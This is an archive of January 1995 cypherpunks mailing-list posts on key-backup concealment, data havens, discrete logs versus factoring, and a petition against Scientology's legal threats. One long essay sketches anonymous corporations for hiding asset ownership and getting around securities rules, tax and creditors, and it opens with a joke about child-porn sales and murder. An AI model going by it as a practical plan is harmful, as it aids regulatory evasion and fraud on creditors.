| With barcoding as the standard, another person prints his key on a small
| unmarked card and hides it somewhere deemed to be secure by him. The
| UPC-label attack fails because his keyring isn't disguised as UPC product
| labels. How does the attacker know what to look for?
| 
| True Paranoids could devise some sort of "invisible ink" method,
| requiring UV or heat exposure before the barcode becomes visible.
| Now your backup key looks like a blank sheet of paper. ;-)

	Picking a few nits:

	Putting the UPC's on things other than cards (such as books)
makes it easier to hide in the open.  `UPC' stickers on, say, a few
books are easier to miss than UPC stickers on index cards.

	Invisible ink draws attention to the correct UPC's once they
know you're using it.  See Kahn for a discussion of secret inks being
developed during the second world war.  If you want to hide bits, they
should be stripped of low entropy parts and hidden with a stego
program.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben.Goren@asu.edu
Date: Wed, 18 Jan 95 16:37:19 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <v02110100ab435e5f6310@[129.219.97.131]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:33 PM 1/18/95, Paul J. Ste. Marie wrote:
>[. . .] As long as
>some piece of info is considered to be a thought-crime, everyone who accepts
>info from a wide range of sources is at risk.

We might have a test case right now for part of that idea--the
Scientologists. They're essentially claiming that the various newsgroups
should be shut down because somebody put thoughtcrime on them. I would
posit that the operator of any automated data transmission/massaging
service is not responsible for the data that passes through her equipment.
Consider, for example, if I used a bang path to route an illicit email note
through, say, apple.com. Does that make Apple Computer responsible for what
I send?

Tying in with some of Eric's comments, this could be viewed as a
fundamental flaw in the 'net: it's the sender, generally, who initiates and
controls the connection, not the recipient. We could view this as an
advantage: how can you blame me for what somebody else does to my computer
without my knowledge, especially if I have no way to stop it short of
getting off the 'net completely?

>> ... The service could even be advertised as a different form of timestamping
>>(or notarizing). Not only do you get the file back signed, but you get it
>>back encrypted and signed. ...
>
>That would still be a useful service, however, but it does transfer the risk
>from the DH operator to the encryptor.  Since he isn't leaving evidence on a
>hard drive, his window of vunerability is somewhat less.

Less to nonexistent. If no human sees it on the encrypting site, no human
can be responsible for it. "They" would have to ban the service outright,
or try to prove that you knew that your site would be used for illicit
purposes. If putting a warning to not export crypto software on an ftp site
is sufficient protection--and, judging from the number of sites which do no
more than that, it is--then a simple statement that the service is not to
be used for any illegal purpose should do fine here.

>    --Paul J. Ste. Marie
>      pstemari@well.sf.ca.us, pstemari@erinet.com

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0x875B059.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 15:42:52 PST
To: grendel@netaxs.com
Subject: Re: Another problem w/Data Havens...
Message-ID: <9501182333.AA09451@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:05 PM 1/17/95 -0700, Ben.Goren@asu.edu wrote:
> ... That's the main reason why I like my idea of having a trusted encryptor.
>Nobody's suggested that the current timestamp operators would be in Deep
>Doo-Doo if they timestampped some piece of thoughtcrime; why should
>somebody who encrypts be any different? ...

Quite possibly the timestampers would be in trouble, the risk for them is 
the same as the risk for the remailers and the DH operators.  As long as 
some piece of info is considered to be a thought-crime, everyone who accepts 
info from a wide range of sources is at risk.

> ... The service could even be advertised as a different form of timestamping
>(or notarizing). Not only do you get the file back signed, but you get it
>back encrypted and signed. ...

That would still be a useful service, however, but it does transfer the risk 
from the DH operator to the encryptor.  Since he isn't leaving evidence on a 
hard drive, his window of vunerability is somewhat less.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pstemari@erinet.com (Paul J. Ste. Marie)
Date: Wed, 18 Jan 95 16:24:19 PST
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: Does encrypted equal safe?
Message-ID: <9501182334.AB09451@eri.erinet.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:55 PM 1/17/95, Sandy Sandfort wrote:
> ... In my law school they taught that the burden of proof in a 
>criminal case was on the government.

Unless of course the case involves porn, drugs, etc, in which case the 
current practice in the American legal system places the onus on the 
accused, regardless of what the Constitution requires.  Civil forfeiture is 
a fine example of this, along with requiring porn producers to demonstrate 
the age of their models, etc ad nauseum.

    --Paul J. Ste. Marie
      pstemari@well.sf.ca.us, pstemari@erinet.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>
Date: Wed, 18 Jan 95 15:53:40 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
Message-ID: <199501182358.SAA29305@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

'Adam Shostack' was reported to have written:

> 	Putting the UPC's on things other than cards (such as books)
> makes it easier to hide in the open.  `UPC' stickers on, say, a few
> books are easier to miss than UPC stickers on index cards.

Exactly. If the intention is to keep them out in the open, then
making labels which resemble UPCs is preferred. However, if I'm
going to dig a hole in the ground at a secret location and bury my
barcoded key in a special container, a different format might be
indicated.

> 	Invisible ink draws attention to the correct UPC's once they
> know you're using it.  See Kahn for a discussion of secret inks being
> developed during the second world war. 

I'll do that, but I think you might be intermixing ideas. Pseudo-UPCs in
invisible ink wouldn't be a good combination. Pseudo-UPCs should 
probably be printed exactly like normal UPCs. If you want the "invisible
ink" process, it should probably blend into the ambient environment as
much as possible. Even if "they" know you're using secret ink, don't "they"
have to find the printed key first? How much work is required to check
every page of every book and every sheet of paper you might have access
to? You could mail your key anywhere in the world invisibly printed on 
the outside of an envelope. Better yet, send someone a special document
(wedding announcement, legal document, 21st birthday card, whatever;
the important part is to send something that the recipient will keep)
with your keyring invisibly printed on it. 

Variations on this theme (there are many) are encouraged. Have a friend
check out a library book and let you stamp your key somewhere inside. It's
the number of possible variations that make this seemingly impossible to
attack. Apologies if this "secret ink" stuff is way off base  ;-) .

Most people (myself included) would opt for the "split and
disguise" or "hidden/buried" key schemes where secret ink wouldn't add
much security.

> If you want to hide bits, they
> should be stripped of low entropy parts and hidden with a stego
> program.

The idea was to use something other than magnetic media. A new and
different optical encoding method could be devised to hide a key in a 
halftone, but the barcode example was offered as one possibility using
an existing standard. The basis for this thread was the perceived need
for a relatively simple key backup system that didn't require the active
participation of a whole hoard of people.


=D.C. Williams	<dcwill@ee.unr.edu>

- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLx2rEyoZzwIn1bdtAQEBVAGAzJc1fOAchLGEIlnbQBiJXV2cICE2WK8e
8FnXnP8ztcWEdUCYY0vjDewiLI2iW4bt
=tUR2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: davidm@iconz.co.nz (David Murray)
Date: Tue, 17 Jan 95 22:06:49 PST
To: cypherpunks@toad.com
Subject: Anonymous corporations (a work in progress...)
Message-ID: <199501180604.TAA02052@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


0. Introduction

It's been a lucrative month, ecash-wise, what with consulting for some 
anonymous Mafia don, selling those kiddieporn mpegs and killing that guy who 
cut Tim May off in the parking lot at the mall. So lucrative, in fact, you 
don't want those digidollars just sitting around on your hard drive -- you 
want them to be earning you something.

The answer, of course, is to invest them in an anonymous corporation.

1. The structure of anonymous corporations

1.1 Outline

An anonymous corporation provides an intersection between the real [a term 
used throughout purely in order to deconstruct it] and digital worlds, a 
point of contact between the e-economy and the real one.

The corporation itself is known: a genuine Delaware/Bahamas/Cayman Islands 
etc corporation, able to own property, to make contracts, to sue (and be 
sued) in the courts and with all the normal rights (and liabilities) of the 
(corporate) citizen.

But the (controlling) investors in the corporation (basically, the 
stockholders) are anonymous. The investment comes in from the stockholders 
in the form of ecash, and is transformed by the company into real money and 
investments.

Because the investors are anonymous and (assuming) the ecash is untraceable, 
truly anonymous control of real assets can be exercised.

1.2 Legal structure

The structure has two parts: a corporation and a trustee.

The corporation is just a normal corporation with directors typically 
supplied by the trustee company that administers the corporation. [Note: the 
trustee company will need assurance that its fees will be paid, and that its 
directors are sufficiently indemnified. See below for discussion on whether 
this is possible under an anonymous structure.] The corporation issues 
shares to the trustee.

The trustee (typically a trustee company - but a different one to that 
administering the company) holds the shares on trust for the anonymous 
beneficiaries. A beneficiary is defined as a person who, for the time being, 
holds an eshare in the trust. Each eshare gives the holder the right to 
direct the trustee on how to vote one of the trustee's shares, the right to 
receive the dividend income of one of the trustee's shares, the right to 
receive any distribution due to one of the trustee's shares (eg on the 
dissolution of the corporation), and the right to participate in the 
enforcement of duties owed to stockholders. That is, each eshare in the 
trust mirrors a share in the corporation.

The two part structure isolates the anonymity from the vagaries of corporate 
law: the register of stockholders of the company will truthfully show the 
Completely Legitimate Perpetual Trustee Company, Inc (or whatever). It also 
deals with the classic corporate agency problem (the separation of ownership 
and control) by allowing the anonymous e-stockholders to enforce their 
rights against (ie sue) the corporation or its management without breaking 
cover -- the trustee is bound by its deed to take the necessary action at 
the (reasonable) behest of the anonymous e-stockholders.

The agency situation is not ideal. Particularly with regard to ensuring that 
the *trustee* performs (including the possibility of collusion between 
directors and trustee), matters of reputation (including the possibility 
that an e-stockholder is a competitor or a testing agency) will be relevant. 
(And, of course, there is the possibility that one or more of the 
e-stockholders is in turn an anonymous corporation, with full rights to sue, 
and no problem with being unmasked.)

Agency problems can be minimised by restricting the operations of the 
corporation. Where the corporation merely holds units in a mutual fund, or a 
piece of real estate, or perhaps even shares in another corporation, the 
directors duties will be minimal -- the corporation acting as a conduit 
only. When the anonymous corporation is undertaking a real business, when 
management has to be hands on and day to day (ie when there is a greater 
disparity of information between management and owners) the chances of 
default by management is probably much greater. Structures could be 
developed to manage this risk.

Note that the anonymous corporation can have any number of e-stockholders, 
from one upwards.

1.3 Technical requirements

The establishment of an anonymous corporation has a number of cryptographic 
requirements:

a) The ready availability of untraceable ecash able to be transformed into 
real money. This could involve a scheme whereby the ebank was unable to know 
which edollars had been issued to which customer, followed by anonymous 
transfer of edollars (ie the bank doesn't know the identity of the 
transferor or the transferee). That is, some flavor of Chaumian system where 
double spending is eliminated by on-line settlement of transfers. The ebank 
would redeem ecash for real dollars. [This, of course, is more of a systemic 
than a cryptographic requirement.]

b) A method for the anonymous issue/subscription of eshares.

c) A method for the anonymous transfer of eshares (with protections against 
'double spending'). These two requirements are essentially a variation on 
the ecash scheme above.

d) A method for secondary market purchasers of eshares to verify which 
company the eshare belongs to.

e) A method for the holders of eshares to vote anonymously.

f) A method for distributing dividends etc to e-stockholders. Perhaps the 
trustee publicly posts an encrypted message. Each eshare acts as a key to 
decrypt one part of the message, revealing ecash (or, in the case of a bonus 
issue of stock, or a stock split, or even a merger, eshares etc). If an 
e-stockholder has more than one share, they will be able to decrypt more 
than one part (ie each part of the message corresponds to one eshare).

In the case of a widely held corporation, information (accounts, voting 
forms etc) can be distributed publicly. In the case of closely held 
corporations (where stockholders are more intimately concerned with 
management) sensitive information could be encrypted for each e-stockholder.

In order to provide maximum flexibility, an anonymous corporation should be 
able to issue many millions of eshares. Similarly, an e-stockholder should 
ideally be able to hold many millions of eshares.

2. Implications

2.1 Implications for the structure

The key (no pun intended) feature of anonymous corporations is, of course, 
that the stockholders (in the beneficial/equitable sense, ie the 
e-stockholders) are not known, and cannot be sued. In so far as corporations 
generally provide limited liability to stockholders anyway, this is not too 
radical a change (and may deflect some criticism). However, it does have 
some repercussions.

a) The anonymity of stockholders will deter creditors.

One of the protections that creditors of a corporation have is that if the 
corporation is unable to pay them, but it has made a payment to the 
stockholders, the creditors can recover the money paid to the stockholders 
as a fraudulent conveyance (or similar). With an anonymous corporation, once 
a payment has been made to stockholders, it is unrecoverable.

In order to encourage lenders to extend credit, the corporation could offer 
to secure the loan (with traceable property [ie if the corporation doesn't 
pay, and deals with the property, the lender can find the property, take it, 
and sell it to cover the unpaid debt], or by pledge [the corporation leaves 
the property with the lender, so if the debt isn't paid the lender can sell 
the property without having to trace it first]). Alternatively, the income 
stream of the company could be encumbered in such a way that creditors had 
to be paid out before stockholders. In general, many of the techniques of 
project financing will be relevant to attracting debt finance.

Trade creditors, especially the directors and the trustee, will also require 
comfort that their bills will be paid and any liability covered. Some 
combination of up front payments, insurance and recourse to the assets of 
the corporation may be enough.

b) The anonymity of stockholders will affect other stockholders

Stockholders sometimes owe duties to other stockholders. In so far as these 
duties extend to e-stockholders (who hold the equitable, but not the legal 
title to the shares) they will be effectively unenforceable [except for the 
possibility of injunctive relief...]. Thus majorities may have more freedom 
in dealing with minorities [in some situations], possibly leading to a 
higher premium for control, and insider trading will be undetectable, 
leading to a more accurate market price for the e-stock (and all other stock).

c) The anonymity of shareholders may be prejudicial

A number of regulatory tests depend upon the identity of (beneficial) 
shareholders, for example tests of foreign control in investment and tax 
laws. Anonymous companies may find that the onus is on them to prove that 
they do not fall into an undesirable category. This will, typically, be 
impossible.

d) The complexity of the structure has a significant cost

As compared with directly owning an asset, owning an asset via an anonymous 
corporation is incredibly costly. There are two layers of fees (to directors 
and to the trustee) and possibly even two layers of tax (at corporation and 
trust levels) to pay on any income, quite apart from the set up costs and 
the administration of the technical/cryptographic structure. Then there is 
the cost in time and effort of monitoring the structure to see that nothing 
is going wrong (the agency cost). And, of course, e-shares are also likely 
to be significantly less liquid than ecash or the assets held by the 
corporation.

And the risk of holding assets via such a structure (default by directors or 
trustee, discovery by traffic analysis, government confiscation of all 
anonymous corporations) must be weighed against the risk/return involved in, 
on the one hand, transforming the ecash into real cash oneself, and, on the 
other, burying a [heavily encrypted] floppy disk in a coffee tin in the back 
yard.

2.2 Implications for the e-economy

a) Eregistries

Some elements of the anonymous corporation could be shared across instances, 
such as directors, trustee and technical/cryptographic structure. This would 
help to reduce costs (including set-up costs) somewhat. And by separating 
the cypherpunkish element (crypto-struct) from the more general, and already 
existing, elements (ie trust companies), it may assist in selling the idea 
to those pre-existing elements and the investing public [private?].

In other words, just as some corporations use outside services to administer 
their share registers, eregistries would handle the mechanics of eshares. 
Eregistries would make the investment in equipment and bandwidth, and charge 
the issuers of eshares (the trustee) a fee for handling the issue, the 
online settlement of transfers, the distribution of dividends etc. Not only 
does this spread the cost of equipment among corporations, but, if standard 
service packages are offered by the eregistries, greatly simplifies the 
drafting of trust deeds [there is only a need to refer to "the services of 
Cypherpunk eRegistry No1 BV", rather than scary maths].

Such eregistries would need a reputation for reliability, honesty and 
(perhaps) regulatory inaccessibility. [They might also provide an extra 
layer of anonymity, acting as a sort of mixer for transactions -- was that 
message a subscription to that corporation, a transfer of an eshare in this 
one, or a vote on some matter for the other?] And they need not, of course, 
be limited to eshares -- eregistries could provide clearing for edebt and ecash.

b) Secured lending -- extending credit to anonyms

Because eshares represent something real, they have real value. A creditor, 
therefore, should be prepared to lend emoney even to a digital pseudonym on 
the security of a pledge of eshares [ie eshares transferred to lender on 
condition that they be transferred back on repayment of loan]. 

(Another way of leveraging the value of your eportfolio is simply to have 
your anonymous corporation borrow the money: capitalise up a corporation, 
have the corporation buy an asset, and have the corporation borrow real 
money secured on that asset -- the corporation can spend the money or pay it 
to the e-stockholder (you) as a dividend...)

Enabling anonymous credit unlocks more of the value of ecash.

c) Why not edebt -- ecash by another name

As you will have noticed, I have made certain assumptions about how ecash 
works [although these assumptions are probably not necessary for the 
functioning of anonymous corporations]. It is time to make those assumptions 
more explicit.

I see a system whereby the average person buys ecash over the net (or even 
off the street), say using their credit card. In return for a (cleared) 
payment the ebank issues a bucket-o-bits, representing that cash (minus a 
fee?). The ebank (via its eregistry) does not know which digital-dollars go 
to which non-anonymous customer. Transfers of ecash take place anonymously 
on line (old buckets revoked, new buckets issued).

What gives the ecash value is the ebank's promise to turn each edollar into 
a real dollar (minus a fee?) when presented for payment. This promise is 
made credible by the ebank's credit rating -- either because it is a 
bank/financial institution itself, or because it invests the original 
payments in some very secure instrument (eg t-bills).

Ecash, in other words, is just an AA(A) rated no interest debt security 
issued at face value. [Of course corporations, anonymous and otherwise, 
could issue other types of edebt -- zero coupon, interest bearing, even 
convertible into eshares...]

This, unfortunately, raises expensive regulatory hurdles for ebanks. Offers 
of securities to the public of the US (whether by a domestic or foreign 
ebank) would seem to require compliance with the Securities Act 1933, the 
Securities Exchange Act 1934, the various requirements of the SEC, and 
probably state investment laws. As well as the costs of mandated ongoing 
disclosure, and the setup costs of such a scheme (accountants, investment 
banks, Wall St lawyers), there are the problems of having to appoint a US 
indenture trustee (yet another body to convince of the merits of the 
scheme...) and produce an SEC approved prospectus (anyone for wading through 
300 Web pages?).

But, of course, these hurdles must be overcome (or bypassed, or even, 
perhaps, simply ignored) for an anonymous e-economy that is fully integrated 
into the real economy to develop.

Quite apart from the regulations, ebanks structured in this way must face 
certain facts of economic life. A stand-alone ebank (ie one which is not 
already a bank or other financial institution) will face not only regulatory 
costs and technical costs (eg eregistries) but also the cost of dealing with 
the real financial system -- it will cost money to get money from investors 
(transfer from their account to yours), and to return money to investors 
(transfer from your account to theirs). To offset these costs, ebanks will 
receive interest income and fee income.

The interest income will be minimal. By definition the assets of the bank 
will be low risk, and therefore low return. It is also likely that the bulk 
of the ecash will be outstanding for a relatively short time (see the mpeg 
you want, buy the ecash, buy the mpeg; the seller receives the ecash and 
converts it, or invests it in an anonymous corporation who converts it), 
perhaps only overnight.

And fees will discourage the use of ecash. The higher the fees, the less the 
prospect of anonymity will appeal to the person on the street (or is that 
the person on the information superhighway?). A certain amount of legitimate 
use would do wonders to smooth the path of the crypteconomy. It is just too 
easy to ban (or anathematise) the whole system if *every* edollar comes from 
the four horsemen of the cryptocalypse.

2.3 Implications for the real economy

a) Response of regulatory authorities

The wholesale interpenetration of the real and digital economies that 
anonymous corporations (and similar structures) allow provides a mechanism 
whereby the ability of  the state to control individuals is lessened. As 
edollars control real assets, edollars too become real, and the anonymous 
e-economy and the real economy merge. [Or, perhaps, since the real economy 
will be bigger than the e-economy, the former *absorbs* the latter.] And 
once this merger has taken place, it will be too late for the state to act.

The state then, will tend to fear loss of control, and, as a distinct subset 
of that, loss of revenue through wholesale tax avoidance.

The tax problem is probably the easiest to solve. Instead of taxing the 
recipients of income, the sources of that income can be taxed (eg 
withholding taxes on dividends and e-dividends), and the ultimate 
expenditure of that income can be taxed (consumption taxes). This may seem 
like a big change, but in the history of taxation (which is just the history 
of bullying) a universal income tax is very recent. And the change is, after 
all, just one of emphasis.

The general response of the state (egged on by the establishment) to the 
prospect of waning control has been discussed at length by this group, as 
has the difficulty of operating in the financial products marketplace. I 
merely mention the possibility that the SEC will refuse any scheme that 
seeks to issue readily convertible anonymous securities, on the grounds that 
it will make the detection of securities offences (such as insider trading 
and stock parking and a million other technical evils) too difficult.

3 Where to from here?

Cypherpunks write code. It would be nice to develop the bank-in-a-box that 
led to a thousand guerilla ebanks springing up around the world (like so 
many points of light in a presidential speech). It may not be that easy.

But the legal and financial systems are still systems, and they can be 
hacked (although they tend to fight back -- forensic black ice...). 
Demonstrate the structures that make ecash a useful tool for solving real 
world problems (like having to pay tax, or signalling one's moves to the 
market), and the crypto-meme could spread to the arch-hackers of Wall St.

And evolving a modest ebank/anon-corp structure ('International Postage, 
Inc'?) might be a way to sneak under the wire of the regulators: no need to 
look too hard at some hobby project of a bunch of propellor heads, after 
all. Some home cooked legal documents, a bit of form filling and Hey Presto 
-- real money to keep remailers and start data havens really going. And when 
we launch the first CyP anonMutual Fund...

<vbg>

Anyway, I'll wait for the feedback and see if it's worth (in the 
moral/political sense) looking at this stuff further. The box the bank comes 
in might be filled with forms.

[BTW -- TINLA] 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 19:01:47 PST
To: cypherpunks@toad.com
Subject: On DH public key crypto
Message-ID: <199501190301.TAA09049@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


Diffie and Hellman did have a public key cipher based on matrices in
their original paper; they knew at the time it didn't work.

This is not the same algorithm as the D-H key exchange protocol.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 19:39:11 PST
To: cypherpunks@toad.com
Subject: Re: Key backup (was: How do I know . ..)
In-Reply-To: <199501181754.MAA24686@bb.hks.net>
Message-ID: <199501190338.TAA09099@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: "Dr. D.C. Williams" <dcwill@ee.unr.edu>

   Safe deposit boxes, by virtue of their accessibility to law enforcement,
   are subject to search and seizure under court order and are sealed
   in certain cases (probate). This makes them likely to be the first place
   to look when the Feds decide that we can't have keys anymore. 

I am not designing systems for the paranoid fantasy of an inspection
of all safety deposit boxes by government agents in search of
contraband.

I am interested in designing systems which will fit into business as
usual, that are inconspicuous by their prevalance, and which will be a
part of ordinary and usual protection of data by cryptographic means.

Our goals appear to differ enough to preclude my continuing
involvement on this topic.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dwa@mirage.svl.trw.com (Dana Albrecht)
Date: Wed, 18 Jan 95 19:39:07 PST
To: cypherpunks@toad.com
Subject: Factorisation and Discrete Logs (was Re: EE Times on PRZ)
Message-ID: <9501190339.AA20854@mirage.svl.trw.com>
MIME-Version: 1.0
Content-Type: text/plain


strick wrote:
> 
> DH uses "discrete log" as the hard problem, and very straightforward
> mathematics.
> 
> RSA uses "factoring" as the hard problem, and a very clever back door.
> 
> How do you decide if one is based on the other?
> 
> # public-key technology with Diffie-Hellman public-key in particular, which
> # (as I understand it) is not particularly secure.
> 
> It's still up in the air, isn't it, whether the discrete log or 
> factoring is the harder to crack.   My intuition is they're the
> same hard.
> 
> I know of no problem with DH that RSA doesn't have similar problems.
> 
> 			strick

 
It seems to me that factoring a large number is no harder than finding
a discrete logarithm.

Assume, for the moment, that an efficient method of computing discrete
logs has been discovered, rendering systems like Diffie-Hellman key
exchange unusuable.

I contend that RSA is now equally unusable.  The following variant of
the Pollard p-1 method should provide an efficient factorisation method
for an RSA modulus, say N.

Choose, at random, "a" such that gcd(a,N) = 1.

Compute x such that:

     a^x = 1 (mod N)          [ Discrete log time! ]

Partially factor x; say x = f  *  f  *  f  ...   where f  is not necessarily
prime.                       1     2     3              n

Note that it is usually easy to partially factor a "random" large integer.
Simply using trial division up to some limit; or, at worst, pollard rho
or pollard p-1 (on x) should suffice.  If you're truly unlucky, pick
another value for a.

Compute:

     M = a^(10000! * f) (mod N)

Where f is some partial factor of x.

gcd(M-1,N) should yield a non-trivial factor of N.  If it doesn't,
another choice of f and/or a should work.

I'm by no means a professional mathematician, but it seems that this
scheme should work.

Comments, anyone?


Dana W. Albrecht
dwa@mirage.svl.trw.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 18 Jan 95 19:52:16 PST
To: cypherpunks@toad.com
Subject: Re: (none)
In-Reply-To: <Pine.3.88.9501181026.A29048-0100000@CSOS.ORST.EDU>
Message-ID: <199501190351.TAA09133@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


   From: Brian Beattie <beattie@CSOS.ORST.EDU>

   I must assume that the actor who spams me or sends me unsolicited
   email or any email for that matter derives some benifit from this 
   activity or they would not do it.

Much tort involves perceived gain by the tortfeasor, but that doesn't
make it theft.

   If I make it clear that I do not wish to receive email from an individual
   or group and that individual or group continues to send email then I contend
   that they are using my resources in a way that I have not authorized.

So who are you making it clear to, if the parties sending the email
are anonymous?

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: skaplin@mirage.skypoint.com (Samuel Kaplin)
Date: Wed, 18 Jan 95 18:02:40 PST
To: cypherpunks@toad.com
Subject: --> A Net-Petition to the Church of Scientology, Please Read (fwd) (fwd)
Message-ID: <lOS7lKjqRKvE077yn@mirage.skypoint.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----



I thought this was topical and VERY much of interest here.

Sam

- -------- Forwarded message --------

[Hurry!  Signature tallying for this petition EXPIRES February 6, 1995!
Be sure to send your signature to cos-petition@netcom.com -- see the
instructions after the petition statement.  The petition statement
begins 68 lines down from here.]


Following this short introductory section is the petition statement to
the Church of Scientology and affiliated organizations regarding their
recent legal actions which have very serious ramifications for freedom
of expression on Usenet and the Internet.  It is somewhat long, but the
length is necessary to give you sufficient information to make an
informed decision.

I want to stress that this petition is NOT focused on the beliefs or
practices of the Church of Scientology.  Rather, it is focused on their
recent legal action, and this petition demands that they reconsider
these actions for the good of everyone, including themselves.  It should
also be made *very clear* that none of us should ever condone or support
any action which would censor or inhibit Scientology supporters from
being able to express their views and opinions on Usenet, the Internet,
and all other electronic forums, provided they do so in accordance with
accepted netiquette, as all of us should.

I encourage you to read the petition statement carefully, and if you
agree with all three demands (given near the end of the statement), to
then "sign" it via Internet e-mail using the instructions which follow
the statement.  Do follow EXACTLY the directions on how to "sign";
they are not difficult.

Note that only those with valid Internet-accessible e-mail addresses can
sign this petition.  Fortunately, nearly all on-line services, such as
CompuServe, and many BBS, do offer Internet e-mail acess, so just about
anybody who is electronically hooked up to some network in the world can
sign this petition.  If you are not sure what your Internet e-mail
address is, ask your site's sysadmin/sysop for assistance.

Please do upload this petition statement as soon as possible to any BBS
and on-line service in your area.  If you have access to one of the
major national on-line services such as CompuServe, Prodigy, AOL, etc.,
do try to upload it there.  We are trying to get at least 5000
signatures.  Even more signatures are entirely possible if we each put
in a little effort to inform others, such as friends and coworkers,
about the importance of this petition to electronic freedom of
expression.

I plan to make the signatures publicly available on or shortly after
February 7, 1995, and will also submit them to the Church of Scientology
as well as the newsmedia.

Important Note:  Because of the unusual sensitivity of this petition, I
will not submit nor reveal the e-mail signatures IF the total number of
validated signatures is less than 1000.  This offer is made for those
who would feel "exposed" if their name appears on a list with a small
number of signatures.  I fully expect to surpass 1000 signatures in one
or two days!  In addition, unlike past net-petitions, providing one's
full name in addition to one's e-mail address will be optional.
However, I highly encourage you to be brave and include your full name,
as all petitions are traditionally considered more "binding" if real
names are used.  I will tally the number of signatures with and without
full names when the petition drive ends February 6, 1995.

Thank you for your signature!  Let's all do our part to keep all
electronic networks free and open for everybody.

Jon Noring

(Disclaimer:  Nothing written in this petition transmittal should be
              construed as legal advice.  If you need legal assistance
              or advice concerning any of the issues brought up in this
              document, contact a qualified attorney.)


**************** Beginning of Petition Statement ********************

TO: The Church of Scientology, The Religious Technology Center, Bridge
    Publications, Inc., Office of Special Affairs, and all other
    affiliated organizations, divisions and corporations of the Church
    of Scientology

We, the undersigned, are disturbed by your recent legal attempts to
stifle the free flow of information on the Internet and Usenet.
Specifically, you have 1) threatened legal action against several
automated anonymous remailers unless they filter out *all* e-mail
targeted to the legitimate Usenet newsgroups alt.religion.scientology
(a.r.s.), and alt.clearing.technology (a.c.t.), open forums where all
points of view about Scientology, both pro and con, are welcome, and
2) demanded and actually attempted the removal of a.r.s. in gross
defiance of accepted Usenet practice and netiquette.

Concerning 1), since nearly all (if not all) of the e-mail sent to
a.r.s. and a.c.t. via the remailers is legitimate and originates from
individuals who sincerely believe they need to post anonymously because
of the nature of discussion, your demand, if implemented, would prevent
these individuals from freely expressing their views in the proper
forum.  Freedom of expression is internationally recognized as one of
the most important and sacred of basic human rights, and your demands
fly in the face of this recognition.  Your second demand, removing
a.r.s., would go even further in inhibiting freedom of expression on
all electronic networks.  It is a *very* serious matter to attempt to
remove forums of free expression.

Your primary argument for issuing these legal threats, according to
your statements, are that some people (the "perpetrators") have
knowingly posted *alleged* (meaning not yet demonstrated in a court of
law) Church of Scientology copyrighted and trade secret material to
a.r.s. and a.c.t., sometimes using the anonymous remailers as the
carrier (because of the common carrier-like nature of anonymous
remailers, the administrators of the remailers have no knowledge of such
activity taking place).  Though we do not condone making copyrighted
material available on any electronic network without the permission of
the copyright holder, your specific legal threats are short-sighted,
perceived to be mean-spirited, ineffective, and are on tenuous legal
grounds because

1) It won't stop those who are determined to make available alleged
   copyrighted materials on electronic networks.  They will find other
   avenues on the electronic networks to do so.  Only prosecuting the
   actual perpetrators will deter this alleged illegal activity.
2) Your demands, if met, will have the effect of leading to significant
   stifling of free speech and the exchange of information on all
   electronic networks which, if not illegal in some jurisdictions, goes
   against all accepted conventions of a free and open society,
3) You have not stated, nor is there any indication, that you intend to
   work in a cooperative manner with legitimate law-enforcement
   agencies, the courts, and/or the Internet to locate and prosecute
   the perpetrators of the *alleged* copyright violations in the
   countries they originated.

Thus, your threats are being construed, rightly or wrongly, by most on
the electronic networks as an attempt to stifle free discussion on
Scientology rather than trying to locate and prosecute the perpetrators
of the *alleged* copyright and trade secret violations.

With respect to the attempted removal of the newsgroup a.r.s., you also
stated that the word 'scientology' is trademarked and thus the name
a.r.s. infringes on such trademark.  This is appallingly ludicrous based
on past case law of similar situations, as well as your implicit
acknowledgement of the legitimacy of a.r.s. by allowing Church of
Scientology approved information to be posted to it by your supporters,
and possibly with your knowledge and/or approval, ever since it was
created July 1991, almost 3.5 years ago.

Therefore, we, the undersigned, make the following demands.

1) Regarding your charges of copyright violation over electronic
   networks:  You will cease all legal action, now and in the future,
   against any person, company, organization, etc., associated or
   affiliated in any way with all electronic networks, including the
   Internet, except that action which is necessary to locate and
   prosecute the perpetrators (as previously defined) of alleged
   copyright and trade secret violations, and other activity in
   violation of law, and *only* in full cooperation with legitimate
   law-enforcement agencies and/or the courts.

2) Regarding your trademark challenge of the Usenet newsgroup
   alt.religion.scientology:  You will cease all legal action, now and
